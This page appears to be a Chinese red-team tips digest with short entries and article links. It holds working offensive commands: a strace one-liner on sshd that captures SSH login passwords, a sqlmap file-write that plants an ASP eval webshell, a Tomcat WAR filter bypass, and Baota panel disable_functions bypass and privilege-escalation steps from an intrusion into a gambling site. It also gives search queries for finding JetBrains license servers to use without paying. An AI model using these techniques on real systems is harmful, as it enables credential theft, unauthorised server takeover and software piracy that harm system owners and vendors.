Quan


WEB安全 内网安全 终端对抗 威胁情报
WEB安全
聊聊那些红队攻击中的"奇技淫巧"

1.如何窃取Linux登录的账号密码
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/sshd.log &)
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/sshd.log
2.不出网的Mssql注入(中文目录写webshell)
上传一个bat文件并执行
python sqlmap.py -r aaaaaaaa.txt --batch --file-write ahell.bat -file-dest c:\users\public\music\ashell.bat
bat的内容为
echo ^<%%eval request("aaaaaa")%%^> >D:\\张三的马赛克\\Content\\images\\logo1.asp
3.Tomcat后台上传WAR包过滤该如何绕过
将文件后缀修改为xxx.w\\\ar


https://mp.weixin.qq.com/s?__biz=Mzg3NDk3NzMwNw==&mid=2247483836&idx=1&sn=f899bf5f453cff4517e8815b9ea16747
WEB安全
JetBrains IntelliJ 系列全家桶激活服务器查找小姿势

如果你不想使用任何的破解程序去激活你的JB家的东西,那么白嫖或许会成为你的不二之选。
在线收集版 但是很多都用不了,只能慢慢尝试
使用FOFA
"Location: https://account.jetbrains.com/fls-auth?uid"
使用Hunter
header="Location: https://account.jetbrains.com/fls-auth?uid"


https://mp.weixin.qq.com/s/T63wEpZk0mzNdJMzoQMUwA
WEB安全
聚合型网络空间测绘引擎

大爱!解决了多年来的愿望,将市面上的那些网络空间测绘引擎的数据爬下来,然后去重后在以WEB的形式展示在团队面前。这对于大型护网项目来说,可以解决极其多的时间和人力成本!


https://github.com/burpheart/koko-moni/
WEB安全
对博彩站点bypass宝塔渗透测试(练手)

这里不去过多地关注怎么打的菠菜站,主要关注这里面的几个技术点
1.PHP写马失败,选择用base64+短标签绕过,Base64解密后是这个
2.但是这样无流量加密的马失败,换哥斯拉完美解决问题
3.宝塔面板如何 bypass disablefunction,文章中介绍的这个方法值得学习:
 * 寻找fpm文件路径:/www/server/php/56/etc/php-fpm.conf
 * 查看Listen字段,发现是在/tmp下
 * 最后使用哥斯拉的BypassdisablefunctionFPMBypass来完成命令回显
4.提权
宝塔的Webshell一旦可以提权到root,其实就相当于拿下来整个宝塔面板
这里他在上传到服务器后发生了一些问题,文章中给出了解决办法:

find / -name cc1
export PATH=$PATH:/usr/libexec/gcc/x86_64-redhat-linux/4.8.2/

这个值得一试,我很多时候就死在这个提权上了。
提权完成后的操作,我们有空继续说


https://mp.weixin.qq.com/s?__biz=Mzg4MjcxMTAwMQ==&mid=2247487226&idx=1&sn=0454a5852cd7b979c29fc75c93009e75
WEB安全
python生成m到n位字母全排列的代码

每次用每次都得去GPT那生成一次,太费劲了,记录一下
import itertools
import string

# 打开文件并准备写入
with open('output.txt', 'w') as f:
    # 从长度为 1 到 5 的字符串
    for length in range(1, 6):
        # 使用 itertools.product 生成所有可能的排列
        for combination in itertools.product(string.ascii_lowercase, repeat=length):
            # 将每个排列组合成字符串并写入文件
            f.write(''.join(combination) + '\n')


http://redteam.wang